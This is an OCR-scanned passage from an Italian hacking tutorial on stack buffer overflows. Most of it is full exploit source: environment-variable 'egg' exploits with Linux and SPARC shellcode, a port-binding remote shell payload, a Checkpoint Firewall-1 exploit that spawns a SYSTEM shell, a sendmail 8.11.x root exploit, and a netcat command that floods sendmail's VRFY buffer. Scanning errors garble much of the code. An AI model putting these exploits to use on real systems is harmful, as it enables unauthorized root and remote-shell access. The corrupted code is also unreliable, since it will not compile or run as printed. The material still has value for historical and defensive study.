* (ptr++) = shellcode [i] ; /* e l'altra meta' con lo 

shellcode . . . */ 

buff [bsize - 1] = '\0'; 



memcpy (buff, "EGG= ", 4) ; 
putenv(buff) ; 
system ( "/bin/bash ") ; 




$ ./exploit3 612 

Using address: 0xbffffdb4 




Come avrete potuto vedere in questo caso si è azzeccato il tutto al primo tentativo. 
In ogni caso i problemi non sono del tutto terminati. 

Potremmo trovarci davanti al problema di avere a disposizione uno spazio troppo piccolo per 
inserirci una quantità di codice eccessiva. 

Anche in questo caso, una soluzione c'e', ma bisogna avere accesso alle variabili d'ambiente 
del programma. 
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Metteremo lo shellcode in una di queste variabili, e riempiremo il piccolo buffer con l'indirizzo 
(presunto) di questa variabile in memoria. 

Questa tecnica e' molto efficiente, poiché' possiamo usare anche variabili molto grandi (leggi: 
un grosso numero di NOP), che aumentano esponenzialmnte le nostre possibilità'. 
Le variabili d'ambiente sono poste in cima allo stack quando il programma e' lanciato (vedi 
diagramma all'inizio). 

Il nostro programma di exploit richiederà' quindi un'altra variabile, la grandezza del buffer che 
contiene shellcode e NOP). 

exploit4 . c 

sn ip 

#include <stdl±b.h> 

#define DEFAULT_OFFSET 0 
idefine DEFAUL T_B UFFER_ SIZE 512 
#define DEFAUL T_EGG_ SIZE 2048 
#define NOP 0x90 

char shellcode [] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89 \xf3 \x8d\x4e \x08 \x8d\x56\x0c \xcd\x80 \x31 \xdb \x89 \xd8 \x40\xcd " 
" \x80 \xe8 \xdc \xff\xff\xff/bin/sh "; 

unsigned long get_esp (void) { 
asm ( "movi %esp, %eax ") ; 

ì 

void main(int argo, char *argv[]) { 
char *buff, *ptr, *egg; 
long *addr _ptr, addr; 

int offset=DEFAULT_OFFSET, bsize =DEFA UL T_B UFFER_ SIZE; 
int i, eggsize=DEFAULT_EGG_SIZE; 

if (argc > 1) bsize = atoi (argv[l] ) ; 
if (argc > 2) offset = atoi (argv [2] ) ; 
if (argc > 3) eggsize = atoi (argv [3] ) ; 



if (!(buff = malloc (bsize) ) ) { 

printf ("Can't allocate memory. \n") ; 
exit (0) ; 

} 

if ( ! (egg = malloc (eggsize) ) ) { 

printf ("Can't allocate memory. \n") ; 
exit (0) ; 

; 

addr = get_esp () - offset; 

printf ("Using address: 0x%x\n", addr) ; 

ptr = buff; 

addr_ptr = (long *) ptr; 
for (i = 0; i < bsize; i+=4) 
*(addr _ptr++) = addr; 

ptr = egg; 

for (i = 0; i < eggsize - strlen (shellcode) - 1; i++) 
*(ptr++) = NOP; 

for (i = 0; i < strlen (shellcode) ; i++) 
*(ptr++) = shellcode [i]; 
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buff[bsize - 1] = '\0'; 
egg[eggslze - 1] = ' \0 ' ; 

memcpy (egg, "EGG=" , 4) ; /* variabile d'ambiente con i NOP e lo 
shellcode */ 
putenv (egg) ; 

memcpy (buff, "RET=" , 4) ; /* variabile d'ambiente che contiene il RET 
*/ 

putenv (buff) ; 
system ( "/bin/bash ") ; 

} 

sn ±p 

$ ./exploit4 768 

Using address: OxbffffdbO 

$ ./vulnerabile $RET 

# 

Gli offset possono essere positivi o negativi., dipende da quanti "dati d'ambiente" il nostro 
programma ha rispetto a quello vulnerabile. 

Prendete i sorgenti. Essedo Linux free, troverete i sorgenti di qualsiasi cosa, basta cercare un 
po'. 

E una volta trovati i sorgenti, cercate chiamate alle funzioni strcat(), strcpy(), sprintf(), and 
vsprintf(), che basandosi su stringhe terminate da ZERO, non controllano che il buffer che le 
riceve sia abbastanza grande da contenerle. 

Controllate se il programma fa qualche tipo di "sanity check" prima di copiare, e controllate se 
l'argomento che viene copiato può' in qualche modo essere inserito dall'utente, attraverso la 
linea di comando ad esempio, o attraverso una variabile d'ambiente (vedi exploit per 
DOSEMU). 



I tre punti fondamentali di un buffer overf low 

Indipendentemente da tutto il resto possiamo aprire una nota per specificare quelli che sono i 
tre punti chiave di un buffer overflow. 

Generalmente abbiamo visto che esistono due punti chiave e precisamente il codice da 
eseguire e l'indirizzo di ritorno. 

La sovrapposizione dell'indirizzo di ritorno abbiamo detto che serve a fare in modo che 
quando questo viene ripristinato il tutto salta a livello di esecuzione al codice asembler da noi 
scritto. 

La difficoltà che abbiamo visto estere è di fatto quella di indovinare il punto preciso di dove il 
salto deve essere esguito in quanto se questo non fosse perfetto il sistema si bloccherebbe o 
perlomeno creerebbe dei problemi di esecuzione. 

L'istruzione NOP non viene eseguita per cui l'inserimento di un numero sufficientemente 
grande di questi NOP permetterebbe al programma di eseguire un atterraggio morbido nel 
caso in cui l'indiirizzo non sia preciso. 
Per cui i punti chiave sono : 

Numero di NOP 
Codice assembler 
Indirizzo di ritorno 

Alla fine di questi capitoli vedremo come questi tre insiemi di dati possono essere manipolati 
per passare sotto i sistemi IDS. 



Shell code per diversi sistemi operativi 

1386/Linux 
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jmp 


Oxl f 


popi 


%esi 


movi 


%esi, 0x8 (%esi) 


xorl 


%eax, %eax 


movb 


%eax, 0x7 (%esi) 


movi 


%eax, Oxc (%esi) 


movb 


$Oxb, %al 


movi 


%esi, %ebx 


leal 


0x8 (%esi) , %ecx 


leal 


Oxc (%esi) , %edx 


int 


$0x80 


xorl 


%ebx, %ebx 


movi 


%ebx, %eax 


ine 


%eax 


int 


$0x80 


cali 


-0x24 



.string \"/bin/sh\" 



SPARC/Solaris 



sethi 


0xbd89a, %16 


or 


%16, Oxl 6e, %16 


sethi 


Oxbdcda, %17 


and 


%sp, %sp, %o0 


add 


%sp, 8, %ol 


xor 


%o2, %o2, %o2 


add 


%sp, 16, %sp 


std 


%16, [%sp -16] 


st 


%sp, [%sp -8] 


st 


%g0, [%sp -4] 


mov 


0x3b, %gl 


ta 


8 


xor 


%o7, %o7, %o0 


mov 


1, %gl 


ta 


8 



SPARC/SunOS 



sethi 


0xbd89a, %16 


or 


%16, Oxl 6e, %16 


sethi 


Oxbdcda, %17 


and 


%sp, %sp, %o0 


add 


%sp, 8, %ol 


xor 


%o2, %o2, %o2 


add 


%sp, 16, %sp 


std 


%16, [%sp - 16] 


st 


%sp, [%sp -8] 


st 


%g0, [%sp -4] 


mov 


0x3b, %gl 


mov 


-Oxl, %15 


ta 


%15 + 1 


xor 


%o7, %o7, %o0 


mov 


1, %gl 


ta 


%15 + 1 



shellcode . h 



iif definedf Ì386 ; SS definedf linux ; 

idefine NOP^SIZE 1 

char nop[] = "\x90"; 

char shellcode [] = 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 
" \x89\xf3 \x8d\x4e \x08 \x8d\x56\x0c\xcd\x80 \x31 \xdb\x89\xd8 \x40\xcd 
"\x80\xe8 \xdc\xff\xff\xff/bin/sh "; 

unsigned long get__sp (void) { 
asm ( "movi %esp, %eax ") ; 

} 

§elif definedf sparc ) SS defined( sun ) SS definedf svr4 ) 
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idefine NOP__SIZE 4 

char nop [] = "\xac\xl5\xal\x6e" ; 

char shellcode [] = 

"\x2d\x0b\xd8\x9a\xac\xl5\xal\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e " 
" \x92 \x03 \xa0\x08 \x94 \xla\x80 \xOa \x9c\x03 \xaO\xlO \xec\x3b\xbf\xf0 " 
" \xdc\x23 \xbf\xf8 \xcO \x23 \xbf\xfc\x82 \xl0\x20 \x3b\x91 \xdO \x20\x08" 
" \x90 \xlb\xcO \x0f\x82 \xl0\x20 \x01 \x91 \xdO \x20\x08"; 

unsigned long get_sp(void) { 
asm ( "or %sp, %sp, %i0"); 

} 

ielif definedf sparc ) && defined( sun ) 

idefine NOP_SIZE 4 

char nop [] = "\xac\xl5\xal\x6e" ; 

char shellcode[] = 

"\x2d\x0b\xd8\x9a\xac\xl5\xal\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e " 
" \x92 \x03 \xa0\x08 \x94 \xla\x80 \xOa \x9c\x03 \xaO\xlO \xec\x3b\xbf\xf0 " 
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\xl0\x20\x3b\xaa\xl0\x3f\xff" 
" \x91 \xd5 \x60 \x01 \x90 \xlb\xcO \x0f\x82 \xl0\x20 \x01 \x91 \xd5 \x60 \x01 "; 

unsigned long get_sp (void) { 
asm ( "or %sp, %sp, %i0"); 

} 

#endif 



eggshell . c 



/* 

* eggshell vi . 0 
* 

* Aleph One / alephl@underground.org 
*/ 

iinclude <stdlib.h> 
iinclude <stdio.h> 
iinclude "shellcode . h" 

idefine DEFAULT_OFFSET 0 
idefine DEFAULT_BUFFER_SIZE 512 
idefine DEFAULT_EGG_SIZE 2048 

void usage(void); 

void main(int argc, char *argv[]) { 
char *ptr, *bof, *egg; 
long *addr _ptr, addr; 

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 
int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE; 

while ( (c = getopt(argc, argv, "a:b:e:o: ")) != EOF) 
switch (c) { 
case 'a' : 

align = atoi (optarg) ; 

break; 
case 'b ' : 

bsize = atoi (optarg) ; 

break; 
case ' e ' : 

eggsize = atoi (optarg) ; 

break; 
case ' o ' : 

offset = atoi (optarg) ; 

break; 
case ' ? ' : 

usage() ; 

exit (0) ; 

} 

if (strlen (shellcode) > eggsize) { 

pr int f ("Shellcode is larger the the egg.\n") ; 
exit (0) ; 

} 
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if ( ! (bof = malloc (bsize) ) ) { 

printf ("Can't allocate memory .\n" ) ; 
exit (0) ; 

} 

if ( ! (egg = malloc (eggsize) ) ) { 

printf ("Can't allocate memory. \n" ) ; 
exit (0) ; 

} 

addr = get_sp() - offset; 

printf ("[ Buffer size : \t%d\t\tEgg size : \t%d\tAligment : \t%d\t] \n" , 

bsize, eggsize, align) ; 
printf ("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset); 

addr_ptr = (long *) bof; 
for (i = 0; i < bsize; i+=4) 

* (addr_ptr++) = addr; 

ptr = egg; 

for (i = 0; i <= eggsize - strlen (shellcode) - NOP_SIZE; i += NOP_SIZE) 
for (n = 0; n < NOP_SIZE; n++) { 
m = (n + align) % NOP_SIZE; 
* (ptr++) = nop[m]; 

} 

for (i = 0; i < strlen (shellcode) ; i++) 

* (ptr++) = shellcode[i] ; 

bof [bsize - 1] = '\0'; 
egg [eggsize - 1] = '\0'; 

memcpy (egg , "EGG=", 4) ; 
putenv (egg) ; 

memcpy (bof , "BOF=" , 4) ; 
putenv (bof ) ; 
system ( "/bin/sh ") ; 



void usage (void) { 

(void) fprintf (stderr, 

"usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o 
<offset>]\n") ; 
> 

Esempio di exploits con shellcode. 

La seguente shellcode crea un socket di ascolto sulla porta 36864 e avvia una shell, 
redirigendo standard input, output ed error sul socket stesso. Una volta corrotto il buffer e 
sovrascritto l'indirizzo di ritorno, con un semplice programma che si connette al socket si 
ottiene una shell remota sulla macchina vittima. 



^include <stdlib.h> 








idefine DEFAULT_OFFSET 0 








idefine DEFAUL T__BUFFER_ SIZE 512 








idefine NOP 0x90 








char shellcode [] = 








"\xeb\x72" 


/* jmp callz */ 




/* socket () */ 








"\x5e " 


/* 


popi %esi */ 




"\x29\xc0" 


/* 


subì %eax, %eax */ 




"\x89\x46\xl0" 




/* movi %eax, 0x10 (%esi) 


*/ 


"\x40" 


/* 


incl %eax */ 




"\x89\xc3 " 


/* 


movi %eax, %ebx */ 




"\x89\x46\x0c" 




/* movi %eax, OxOc (%esi) 


*/ 


"\x40" 


/* 


incl %eax */ 




"\x89\x46\x08" 


/* 


movi %eax, 0x08 (%esi) */ 




"\x8d\x4e\x08" 




/* leal 0x08 (%esi) , %ecx 


*/ 


"\xb0\x66" 




/* movb $0x66, %al */ 




"\xcd\x80" 




/* int $0x80 */ 




/* bind() */ 








"\x43" 


/* 


incl %ebx */ 




"\xc6\x46\xl0\xl0" 


/* 


movb $0x10, 0x10 (%esi) */ 




"\x66\x89\x5e\xl4" 


/* 


movw %bx, 0x14 (%esi) */ 
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•\x29\xc0" 




/* 


subì %eax, %eax */ 




'\x89\xc2" 




/* 


movi %eax, %edx */ 




'\x89\x46\xl8" 






/* movi %eax, 0x18 (%esi) 


*/ 


'\xb0\x90" 




/* 


movb $0x90, %al */ 




'\x66\x89\x46\xl6" 




/* 


movw Sax, 0x16 (%esi) */ 




'\x8d\x4e\xl4" 






/* leal 0x14 (%esi) , %ecx 


*/ 


•\x89\x4e\x0c" 






/* movi %ecx, OxOc (%esi) 


*/ 


'\x8d\x4e\x08" 






/* leal 0x08 (%esi) , %ecx 


*/ 


'\xb0\x66" 




/* 


movb $0x66, %al */ 




'\xcd\x80" 




/* 


Int $0x80 */ 




/* listenf) 


*/ 








'\x89\x5e\x0c" 






/* movi %ebx, OxOc (%esi) 


*/ 


'\x43" 




/* 


incl %ebx */ 




'\x43" 




/* 


incl %ebx */ 




'\xb0\x66" 




/* 


movb $0x66, %al */ 




'\xcd\x80" 




/* 


int $0x80 */ 




/* accept () 


*/ 








'\x89\x56\x0c" 






/* movi %edx, OxOc (%esi) 


*/ 


'\x89\x56\xl0" 






/* movi %edx, 0x10 (%esi) 


*/ 


'\xb0\x66" 




/* 


movb $0x66, %al */ 




'\x43" 




/* 


incl %ebx */ 




'\xcd\x80" 




/* 


int $0x80 */ 




/* dup2(s, 


0); dup2(s, 1); dup2(s, 2); */ 








'\x86\xc3 " 




/* 


xchgb %al, %bl */ 




'\xb0\x3f 






/* movb $0x3f, %al */ 




'\x29\xc9" 




/* 


subì %ecx, %ecx */ 




'\xcd\x80" 




/* 


int $0x80 */ 




'\xb0\x3f 






/* movb $0x3f, %al */ 




'\x41" 




/* 


incl %ecx */ 




'\xcd\x80" 




/* 


int $0x80 */ 




'\xb0\x3f" 






/* movb $0x3f, %al */ 




•\x41" 




/* 


incl %ecx */ 




'\xcd\x80" 




/* 


int $0x80 */ 




/* execvef) 


*/ 








'\x88\x56\x07" 






/* movb %dl, 0x07 (%esi) */ 


'\x89\x76\x0c" 






/* movi %esi, OxOc (%esi) 


*/ 


'\x87\xf3" 






/* xchgl %esi, %ebx */ 




•\x8d\x4b\x0c" 






/* leal OxOc (%ebx) , %ecx 


*/ 


'\xbO\xOb" 




/* 


movb $0x0b, %al */ 




'\xcd\x80" 




/* 


int $0x80 */ 




/* callz: * 


/ 








'\xe8 \x89\xff\xff\xff" 




/* cali start */ 




'/bin/sh "; 











unsigned long get_sp (void) { 
asm C "movi %esp, %eax") ; 

} 



void main(int argc, char *argv[]) { 
char *buff, *ptr; 
long *addr jptr, addr; 

int off set=DEFAULT OFFSET , bsize=DEFAULT_BUFFER_SIZE; 
int i; 

if (argc > 1) bsize =atoi (argv[l] ) ; 
if (argc > 2) offset =atoi (argv[2] ) ; 
if (! (buff =malloc (bsize))) { 

printf ("Can ' t allocate memory.\n") ; 

exit (0) ; 

} 

addr =get sp() — offset; 
ptr =buff; 

addr ptr =(long *) ptr; 

for (i =0; i < bsize; i+=4) 

* (addr_ptr++) =addr; 

for (i =0; i < bsize/2; i++) 
buff[i] =NOP; 

ptr =buff + ((bsize/2) - (strlen (shellcode) /2) ) ; 

for (i =0; i < strlen (shellcode) ; i++) 

*(ptr++) =shellcode[i] ; 

buff [bsize - 1] ='\0'; 
memcpy(buff,"EGG=",4); 
putenv(buff); 
system("/bin/bash"); 

} 
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Lo stack inizia per ogni programma allo stesso indirizzo. La maggior parte dei programmi non 
impilano più di qualche centinaio o migliaio di byte sullo stack. 

Quindi, sapendo dove inizia lo stack si può provare ad indovinare dove si trovi il buffer. Il 
programma prende come parametri una dimensione di buffer e un offset dallo stack pointer e 
prova ad indovinare esattamente dove sia l'indirizzo d'inizio del codice. 
Un modo per aumentare le nostre probabilità di riuscita consiste nel riempire l'inizio del buffer 
con istruzioni NOP, cioè, l'operazione nulla. 

Si riempie per metà il buffer, si mette il codice della shell al centro e poi l'indirizzo di ritorno. 
Se l'indirizzo di ritorno punta in mezzo alle operazioni NOP, queste vengono eseguite e poi 
viene eseguito il codice. 

Assumendo che S stia per il codice della shell, N per l'istruzione NOP, lo stack si presenta 
come segue: 



memoria 
bassa 



memoria 
alta 





buffer 




SFP 


RET 


a 


b 


C 






NMMNSSSSSSSSSSS 















top 
stack 




bottoni 
stack 



Una buona scelta per la dimensione del buffer è 1 00 byte più del buffer vittima. 

Questa scelta posiziona il codice alla fine del buffer, lasciando ampio spazio per le operazioni 

NOP, ma permette ancora di sovrascrivere l'indirizzo di ritorno con quello indovinato. 

La stringa per creare l'overflow viene inserita nella variabile di ambiente EGG. 

Qui a seguito potete vedere un esempio di exploit che utilizza questo metodo dei NOP. 

/* badboy.c - Win32 Checkpoint Firewall-1 overflow exploit by Indigo 

<indigo@exploitingstuff. com> 2001 

Usage: badboy <victim port> 

The shellcode spawns a shell on the chosen port 

Main shellcode adapted from code written by izan@deepzone.org 

Greets to: 

Morphsta, BrOOt, Macavity, Jacob & Monkfish . . .Not forgetting D- 
Niderlunds 
*/ 



^include <windows.h> 
iinclude <stdio.h> 

int main (int argc, char **argv) 
{ 

unsigned char shellcode [] = 

" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
" \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 \x90 " 
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"\x90 


\x90 


\x90 


\x90 


1x90 


\x90 


\x90 


1x90 


1x90 


1x90 


1x90 


1x90 
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" \xDE\xBC\xD9 \x99 \xF3 \xA9 \x66\xOC\xD6\xBC\xD9 \x99 \x70\x20 \x67\x66" 
"\x66\xl4\x2C\xC0\xBF\xD9\x99\x34\xC9\x66\x0C\x8B\xBC\xD9\x99\xl4" 
"\x2C\xC4\xBF\xD9\x99\x34\xC9\x66\x0C\x8B\xBC\xD9\x99\xF3\x99\x66" 
"\xOC\xCE\xBC\xD9\x99\xC8\xCF\xFl \xED\xDC\xl6\x99\x09\xC3\x66\x8B" 
" \xC9 \xC2 \xCO \xCE\xC7\xC8 \xCF\xCA \xFl \xEl \xDC\xl6\x99\x09\xC3 \x66" 
" \x8B \xC9 \x35 \xlD \x59 \xEC\x62 \xCl \x32 \xC0 \x7B\x70 \x5A \xCE\xCA \xD6" 
" \xDA\xD2 \xAA\xAB \x99 \xEA \xF6\xFA \xF2 \xFC\xED \x99 \xFB \xF0 \xF7\xFD " 
"\x99\ xF5 \ xFO \ xEA \ xED \ xFC \xF7\x99\ xF8 \ xFA \ xFA \ xFC \ xE9 \ xED \x99\ xEA " 
" \ xFC \xF7\ xFD \x99\ xEB \ xFC \ xFA \ xEF \x99\ xFA \ xF5 \xF6\ xEA \ xFC \ xEA \xF6" 
" \xFA\xF2 \xFC\xED \x99 \xD2 \xDC\xCB \xD7\xDC\xD5 \xAA \xAB \x99\xDA \xEB " 
" \ xFC \ xF8 \ xED \ xFC \ xC9 \ xFO \ xE9 \ xFC \x99\ xDE \ xFC \ xED \ xCA \ xED \ xF8 \ xEB " 
" \xED \xEC\xE9 \xDO \xF7\xFE\xF6\xD8\x99 \xDA \xEB \xFC\xF8 \xED \xFC\xC9 " 
" \ xEB \xF6\ xFA \ xFC \ xEA \ xEA \xD8\x99\ xC9 \ xFC \ xFC \ xF2 \xD7\ xF8 \ xF4 \ xFC " 
" \xFD \xC9 \xFO \xE9 \xFC\x99 \xDE\xF5 \xF6\xFB \xF8 \xF5 \xD8 \xF5 \xF5 \xF6" 
" \ xFA \x99\ xCB \ xFC \ xF8 \ xFD \ xDF \xF0\ xF5 \ xFC \x99\ xCE \ xEB \xF0\ xED \ xFC " 
" \xDF\xFO \xF5 \xFC\x99 \xCA \xF5 \xFC\xFC\xE9 \x99 \xDA \xF5 \xF6\xEA \xFC" 
" \xDl \xF8 \xF7\xFD \xF5 \xFC\x99 \xDC\xEl \xF0 \xED \xC9 \xEB \xF6\xFA \xFC" 
" \ xEA \ xEA \x99\ xDA \xF6\ xFD \ xFC \ xFD \xB9\ xFB \xE0\xB9\ xE5 \ xC3 \ xF8 \xF7" 
" \xB9 \xA5 \xFO \xE3 \xF8 \xF7\xD9 \xFD\xFC\xFC\xE9 \xE3 \xF6\xF7\xFC\xB7" 
" \xF6\xEB \xFE\xA7\x9B \x99 \x86\xDl \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 " 
"\x99\x99\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99" 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99\x99 \x99 \x99 \x99\x99 \x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99\x99 \x99\x99 \x99 " 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99\x99 \x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \xDA\xD4 \xDD \xB7\xDC\xCl \xDC\x99\x99 \x99\x99 \x99 " 
" \x89 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99 \x99\x99 \x99 \x99 " 
" \x99 \x99 \x99 \x99 \x90 \x90 \x90 \x90 \x90 \x00 "; 

FILE *fp; 

unsigned short Int a __port; 

prlntf ( "\nFlrewall-l buffer overflow launcher\nby Indigo 
<±nd±go@explo±tingstuff. com> 2001 \n \n ") ; 

prlntf ("To perforiti thls exploit you must attack from a valld GUI cllent 
machine \n ") ; 

prlntf ("i.e. your IP address must be contalned In the 
$FWDIR/conf/gul-cllents flle\n ") ; 

prlntf ("Thls program wlll create a binary file called exploit .bln\n") ; 

prlntf ("First open the Firewall-1 GUI log Viewer program then enter\nthe 

victim IP address in the Management Server field\n") ; 

prlntf ("and a few random characters in the password field,\n"); 

prlntf ("open badboy.bin in notepad, highlight it ali then copy it to the 

clipboard. \n ") ; 

prlntf ("Paste it into the User Name field of the GUI log Viewer then click 
OK. \n\n"); 

prlntf ( "Launch netcat : ne <victim host> <victim port>\n") ; 

prlntf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n") ; 

if (arge != 2) 
{ 

prlntf ("Usage: %s <victim port>\n", argv[0]); 
exit (0) ; 

} 

a __port = htons (atoi (argv[l] ) ) ; 
a _port*= 0x9999; 

shellcode[1567]= (a _port) & Oxff; 
shellcode[1568]= (a _port » 8) & Oxff; 

fp = fopen (" ./exploit. bin", "wb") ; 

fputs (shellcode, fp) ; 

foiose (fp); 
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return 0; 



Sendmail e buffer overf low 

Una delle domande che potrebbero sorgere relativamente ai buffers overflow è dove questi 
possono trovare un applicazione. 

Chiaramente la risposta è ovunque un programma esegue un input dall'esterno. 
Una cosa che dobbiamo sempre ricordarci è che anche servizi offerti dea servers vari 
possono essere utilizzati anche da programmi non esplicitamente destinati alla loro gestione. 
Cosa significa questo ? 

Prendiamo le funzioni offerte da un mail server come Sendmail. 

Chiaramente si pensa che l'interazione con un software come questo debba di fatto essere 

eseguito da un client come ad esempio Outlook o TheBat!. 

Sbagliato. 

L'hacker in genere relaziona con questi mediante la falsificazione eseguita con NETCAT o 
con TELNET. 

Riportiamo sempre come esempio quello di Sendmail. 

Questo possiede un buffer di 128 bytes utilizzato dal comando VRFYdi questo nel quale 
dovrebbe essere inserito uno username. 

Se volessimo cercare di mandare in tilt sendmail potremmo inserire dentro a questo buffer 
una stringa di 2000 caratteri, ad esempio. 

Ricordiamoci che i comandi come NETCAT possono essere usati in congiunzione con altri 

mediante l'operatore pipe ( | ). 

L'esempio di prima potrebbe essere eseguito tramite : 



echo "vrfy 'peri -e print "a" x 1000"" Ine 



■target.com 25 



Mediante il peri eseguiamo la stampa di 1 000 caratteri a all'interno del buffer usato da vrfy sul 
sistema specificato come argomento di neteat sulla porta 25. 

Un sorgente legato all'exploit di SENDMAIL mediante buffer overflow è quelo che segue : 



/* 
* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 

* 



alsou. c 

sendmail-8 . 11 . x linux x86 exploit 

To use this exploit you should know two numbers: VECT and GOT . 
Use gdb to find the first : 

$ gdb -q /usr/sbin/ sendmail 

(gdb) break tTflag 
Breakpoint 1 at 0x8080629 

(gdb) r -dl-1.1 

Starting program: /usr/sbin/ sendmail -dl-1.1 

Breakpoint 1, 0x8080629 in tTflag () 
(gdb) disassemble tTflag 



0x80806ea <tTflag+202> : dee 

0x80806eb <tTflag+203> : mov 

0x80806ee <tTflag+206> : jmp 

0x80806 fO <tTflag+208>: mov 

0x80806 f 5 <tTflag+213>: mov 

0x80806 f 8 <tTflag+216>: ine 
0x80806 f 9 <tTflag+211>: 



%edi 

%edi, 0xfffffff8 (%ebp) 
0x80806 f 9 <tTflag+217> 
0x80b21f4, %eax 

%bl, (%esi, %eax, 1) 
%esi 

0xfffffff8 (%ebp) , %esi 
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* 

* (gdb) x/x 0x80b21f4 

* 0x80b21f4 <tTvect>: 0x080b9ae0 

■fa AAAAAAAAAAAAA ^/ECT 

* 

* Use objdump to find the secondi 

* $ objdump -R /usr/sbln/sendmall Igrep setuid 

* 0809e07c R_386_JUMP_SL0T setuid 

4 AAAAAAAAA QQ rj^l 
* 

* Probably you should play wlth OFFSET to make exploit work. 
* 

* Constant values, written In this code found for sendmail-8 . 11 . 4 

* on RedHat-6.2. For sendmail-8 . 11 . 0 on RedHat-6.2 try VECT = 
0x080b9ae0 and 

* GOT = 0x0809e07c. 
* 

* To get rOOt type ./alsou and then press Ctrl+C. 
* 

* 

* grange <grange@rt . mipt . ru> 
* 

*/ 

^include <sys/types .h> 
^include <stdlib.h> 

idefine OFFSET 1000 
#define VECT 0x080baf20 
#define GOT 0x0809f544 

#define NOPNUM 1024 

char shellcode[] = 

" \x31 \xc0 \x31 \xdb \xb0 \xl 7 \xcd\x80 " 
" \xb0 \x2e \xcd\x80 \xeb \xl5\x5b \x31 " 
" \xc0 \x88 \x43 \x07\x89 \x5b \x08 \x89" 
" \x43 \x0c \x8d\x4b \x08 \x31 \xd2 \xb0 " 
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff" 
"/bin/sh "; 

unsigned int get_esp() 
{ 

asm ( "movi %esp, %eax ") ; 

} 

int main(int argc, char *argv[]) 
{ 

char *egg, s[256], tmp[256] , *av[3], *ev[2]; 

unsigned int got = GOT, vect = VECT, ret, first, last, i; 

egg = (char *)malloc (strlen (shellcode) + NOPNUM + 5) ; 
if (egg == NULL) { 

perror ( "malloc () ") ; 

exit (-1) ; 

} 

sprint f (egg, "EGG= ") ; 

memset(egg + 4, 0x90, NOPNUM); 

sprint f (egg + 4 + NOPNUM, "%s", shellcode) ; 

ret = get_esp() + OFFSET; 
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sprintf(s, "-d"); 

first = -vect - (Oxffffffff - got + 1) ; 
last = first; 
while (ret) { 

i = ret S Oxff; 

sprint f (tmp, "%u-%u.%u-", first, last, i ) ; 
strcat (s, tmp); 
last = ++first; 
ret = ret » 8; 

} 

s[strlen(s) - 1] = ' \0 ' ; 

av[0] = " /usr/sbin/sendmail" ; 

av[l] = s; 

av[2] = NULL; 

ev[0] = egg; 

ev[l] = NULL; 

execve(*av, av, ev) ; 



Esempi pratici di buffers overf low 

Il buffer overflow può essere ovunque e precisamente in qualsiasi punto dove una 
programma accetta direttamente o indirettamente dell'input. 

Ad esempio era stato scoperto un buffer overflow all'interno del campo della data della testata 
dei messaggi accettati da qualche mail server. 

Se ad esempio ci fossimo collegati al solito mailserver con TELNET o con NETCAT e 
avessimo digitato nel punto dove avrebbe dovuto essere inserita la data un buffer di 100 
caratteri con alla fine il codice che avrebbe dovuto essere eseguito, questo avrebbe compiuto 
il suo compito ovvero quello di creare uno sconfinamento del buffer con esecuzione 
perniciosa del codice. 

Ma vediamo qualche esempio di buffer overflow particolare. 

Uno di quelli a pericolosità altissima per il WEB Server MS è quello definito con il termine di 
IPP Buffer Overflow. 

Questo avviene quando il buffer assume come dimensioni circa 420 bytes. 

Questo tipo di problema derivava da un filtro ISAPI che permetteva la gestione dei files 

.printer. 



Extension 


Executable Path 


| Verbs A 


.idc 


